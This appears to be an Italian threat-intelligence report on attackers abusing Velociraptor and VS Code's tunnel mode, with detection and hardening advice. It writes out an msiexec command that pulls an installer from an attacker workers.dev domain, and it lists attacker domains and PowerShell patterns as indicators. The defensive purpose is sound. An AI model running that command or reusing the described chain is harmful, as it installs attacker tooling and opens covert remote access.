Sommario
Ricercatori del Counter Threat Unit hanno indagato nell’agosto 2025 un’intrusione che abusa del tool open-source Velociraptor per scaricare ed eseguire Visual Studio Code con opzione di tunneling attiva, creando un canale verso server di comando e controllo e riducendo drasticamente gli indicatori classici di malware. L’attore ostile usa msiexec per recuperare un installer da un dominio Cloudflare Workers, distribuisce Velociraptor preconfigurato per parlare con un C2 e avvia un PowerShell codificato che installa code.exe in modalità tunnel, generando un alert su Taegis legato a accesso remoto ed esecuzione di codice. Il caso rappresenta un’evoluzione dall’abuso dei tool RMM verso l’arma-tizzazione di strumenti DFIR, minimizza il deployment di payload dannosi, mantiene persistenza con servizi legittimi e prepara il terreno a ondate di ransomware. Indicatori includono domini workers.dev e componenti collegati, mentre protezioni come quelle di Sophos segnalano e bloccano vari artefatti. Le raccomandazioni convergono su monitoraggio proattivo, controllo degli strumenti legittimi e caccia mirata agli usi anomali di Velociraptor.
Contesto e innovazione offensiva
Gli avversari sfruttano strumenti legittimi per ridurre la superficie di rilevazione e confondersi nel rumore di rete. In questa intrusione, Velociraptor, nato per digital forensics e incident response, diventa un vettore di accesso remoto e orchestrazione. La scelta abbatte i segnali tipici dei trojan, sfrutta telemetrie attese nei SOC e scardina controlli basati su signature. L’adozione di Cloudflare Workers come staging per installer e binari consente delivery affidabile, cifratura di trasporto e hosting dinamico. L’unione di msiexec, PowerShell e VS Code in modalità tunnel crea una catena composta da elementi comuni nelle reti aziendali, con bassa soglia di allarme se non esistono policy che vietano l’uso non autorizzato.
Sequenza d’attacco ricostruita
L’attore lancia msiexec per recuperare un installer denominato, ad esempio, v2.msi dal dominio files.qaubctgg.workers.dev. L’installer deposita Velociraptor, già configurato per collegarsi al C2 su velo.qaubctgg.workers.dev e scarica strumenti ancillari come componenti di Cloudflare tunneling e utilità Radmin. Una successiva istruzione PowerShell codificata in Base64 scarica Visual Studio Code (code.exe) dalla stessa cartella di staging e lo esegue con –tunnel attivo. La sessione abilita un endpoint accessibile da remoto, instradato attraverso infrastrutture legittime, spesso con autenticazioni applicative che mascherano il canale come traffico amministrativo. La catena può installare code.exe come servizio, persistere ai riavvii, registrare output su file di log, e lanciare ulteriori installer come sc.msi per consolidare capacità di comando e controllo. La catena osservata combina msiexec, Velociraptor, PowerShell e VS Code con –tunnel per creare un canale C2 a bassa frizione. L’installer recuperato da files.qaubctgg.workers.dev deposita Velociraptor e configura l’endpoint verso velo.qaubctgg.workers.dev. Un PowerShell codificato scarica code.exe e lo avvia con il tunneling attivo, talvolta installandolo come servizio per mantenere persistenza. Il process tree tipico mostra msiexec.exe che genera powershell.exe, a sua volta genitore di Velociraptor e code.exe; i log evidenziano -EncodedCommand, uso di Invoke-WebRequest e parametri –tunnel. La rilevazione affidabile dipende dall’unione di tre segnali: invocazioni msiexec verso domini workers.dev, processi code.exe con –tunnel su host non di sviluppo, e Velociraptor in esecuzione senza corrispondenti change ticket o policy. La mitigazione efficace blocca –tunnel dove non serve, limita msiexec a repository interni, forza Constrained Language Mode su PowerShell, e impone allowlist rigorose per agent DFIR e RMM. In questo modello, gli attaccanti perdono la capacità di orchestrare accesso remoto “silenzioso” e vengono spinti a pattern più rumorosi, più facili da contenere prima del ransomware.
Perché Velociraptor è appetibile agli attaccanti
Velociraptor è progettato per acquisire artefatti, eseguire query VQL, raccogliere telemetria e agevolare risposta agli incidenti. Gli attaccanti ribaltano questa logica: usano un DFIR agent come remote operations agent, beneficiano di firmware-level trust percepito, sfruttano whitelist interne e riducono i segnali anomali. L’integrazione con pipeline PowerShell e msiexec consente installazioni silenziose, mentre profili preconfigurati indirizzano il client verso C2 esterni mimetizzati. Il risultato è un accesso laterale affidabile, con capacità di file transfer, esecuzione comandi, raccolta credenziali e staging di ulteriori strumenti, senza lasciare dropper vistosi su disco.
VS Code Tunnel come backdoor living-off-the-land
La funzione –tunnel di Visual Studio Code consente a sviluppatori di esporre un workspace per accesso remoto tramite l’ecosistema Microsoft/VS Code. Gli avversari la piegano a backdoor low-noise che attraversa firewall e proxy, eredita certificati e pattern di traffico legittimi e si integra in flussi già consentiti. Una volta avviato il tunnel, l’attore può caricare estensioni, lanciare terminal integrati, eseguire comandi e orchestrare script con privilegi dell’utente compromesso. Questo meccanismo genera alert Taegis laddove i controlli monitorano VS Code come vettore di remote code execution, ma in molte realtà l’uso di code.exe è ammesso e poco soggetto a restrizioni.
Infrastruttura e indicatori osservati
L’uso di Cloudflare Workers offre agli attaccanti scalabilità e basso attrito. Nella campagna di agosto 2025 compaiono domini come files.qaubctgg.workers.dev per lo staging e velo.qaubctgg.workers.dev per la telemetria C2 di Velociraptor. L’installer v2.msi funge da bootstrap, mentre sc.msi deposita moduli di supporto. Gli IOC includono richieste msiexec verso workers.dev, invocazioni PowerShell con -EncodedCommand, creazione di servizi collegati a code.exe, e process tree dove Velociraptor è il genitore del processo VS Code con flag –tunnel. Dove presenti, i prodotti EDR registrano correlazioni tra msiexec, cmd, powershell.exe, code.exe e scritture di configurazione di Velociraptor in cartelle di programma o dati applicativi.
Implicazioni strategiche e rischio ransomware
L’attività osservata si colloca nella fase pre-ransomware. Gli attori testano persistence, copertura e canali di comando prima di introdurre encryptor o wiper. Il vantaggio di una backdoor basata su VS Code Tunnel è duplice: evita i blocchi reputazionali tipici, e consente un controllo manuale accurato per mappare domini, privilegi e share sensibili. Il ricorso a un DFIR tool riduce la soglia d’allarme, sfrutta policy permissive e ritarda la rilevazione. In assenza di caccia proattiva, il primo segno tangibile può coincidere con esfiltrazione e movimenti laterali rapidi, seguiti da cifrazione coordinata.
Evoluzione dagli abusi RMM agli abusi DFIR
Molti incidenti recenti mostrano l’abuso di tool RMM come AnyDesk, ScreenConnect o MeshCentral. Il passo successivo è l’uso di strumenti DFIR ampiamente distribuiti e firmati, capaci di eseguire azioni low-level. Velociraptor rientra in questa traiettoria: la sua modularità e la telemetria integrata sono preziose anche per un avversario. Il Counter Threat Unit evidenzia come il pattern di agosto 2025 estenda le tecniche già viste con RMM, aumentandone la resilienza grazie a C2 su workers.dev e all’innesto del tunnel di VS Code per il controllo manuale.
Dettagli tecnici da osservare su endpoint e rete
Sul piano host, i SOC dovrebbero cercare invocazioni msiexec /i https://files.qaubctgg.workers.dev/…/v2.msi, servizi creati con code.exe come binario, processi code.exe con parametri –tunnel e child processes atipici, oltre a file di configurazione di Velociraptor e canali named pipe caratteristici. Nei log PowerShell, la presenza di -EncodedCommand, Invoke-WebRequest, Start-Process e stringhe Base64 collegate a code.exe e a workers.dev è un segnale. A rete, connessioni HTTPS a sottodomini workers.dev, pacchetti di handshake compatibili con Cloudflare e latenza coerente con hop extra indicano possibile tunneling. Correlazioni temporali tra installazioni MSI, apertura del tunnel e nuove policy di servizio completano il quadro.
Rilevazione e caccia: come costruire query efficaci
L’approccio più efficace unisce UEBA e SIEM. Conviene creare correlazioni che leghino msiexec a URL workers.dev, seguite da PowerShell con -EncodedCommand e dalla comparsa di processi code.exe con –tunnel. Una seconda famiglia di regole collega Velociraptor come parent a code.exe e cattura servizi appena creati in HKLM\SYSTEM\CurrentControlSet\Services con path verso cartelle non standard. Su DNS, l’osservazione di lookup ripetuti a files.qaubctgg.workers.dev e velo.qaubctgg.workers.dev fornisce pivot. Il threat hunting periodico sugli endpoint include il controllo di prefetch, ShimCache, AmCache e SRUM per segnali di esecuzione MSI e successivo avvio del tunnel.
Mitigazione e hardening senza soffocare la produttività
La difesa deve essere granulare. Le organizzazioni definiscono policy per Velociraptor: scoperta degli asset dove è autorizzato, hash e versioni consentite, config server ammessi, e blocco di elevazioni fuori playbook. Per Visual Studio Code, l’uso di –tunnel va vietato o circoscritto a macchine di sviluppo segregate, con Conditional Access che differenzia i permessi rispetto ai client standard. L’esecuzione di msiexec con sorgenti HTTP/HTTPS esterne va monitorata, e dove possibile limitata a repository interni. PowerShell opera in Constrained Language Mode, con ASR rules che impediscono script obfuscati e l’avvio di processi figlio sospetti. L’adozione di EDR in block mode, Application Control e allowlist per DFIR/RMM riduce drasticamente gli abusi.
Risposta agli incidenti: mappare e bonificare in fretta
Alla rilevazione di VS Code in modalità tunnel non autorizzata o di Velociraptor fuori standard, la priorità è isolare l’host, bloccare i domini C2 e acquisire memory dump dei processi code.exe e agent DFIR. L’analisi ricostruisce connessioni uscenti, token di sessione, chiavi e registri di servizio. Segue revoca di credenziali, ripristino di impostazioni PowerShell, rimozione di servizi code, disinstallazione dell’agent DFIR non conforme e rotazione delle password amministrative. La fase di post-mortem aggiorna playbook, regole SIEM e policy MDM, e introduce canary control per l’uso di tunnel e DFIR agent.
Lezioni apprese per governance e supply chain
Il caso sottolinea che gli strumenti di fiducia meritano governance rigorosa. I team devono mantenere un registro degli strumenti DFIR e RMM autorizzati, dei team owner, dei C2 leciti e dei fingerprint di configurazione. I contratti con i fornitori dovrebbero includere clausole su telemetria minimale, controlli di accesso e scopi consentiti. La supply chain interna va testata con red team che tentino di usare VS Code Tunnel e Velociraptor fuori policy, così da validare che SIEM ed EDR generino segnali tempestivi.
Convergenza con tattiche note e varianti future
È plausibile che gli avversari estendano il paradigma a tool come Kusto/Log CLI, Azure Dev CLI o a telemetry collector aziendali, sfruttando la fiducia infrastrutturale. Varianti potrebbero impiegare GitHub Codespaces, Dev Tunnels alternativi o reverse proxy containerizzati, mantenendo lo stesso principio: riutilizzare strumenti di lavoro per aprire porte invisibili alla difesa tradizionale. La risposta richiede modelli comportamentali che prescindano dall’hash e considerino il perché un tool sia in esecuzione su una determinata macchina.
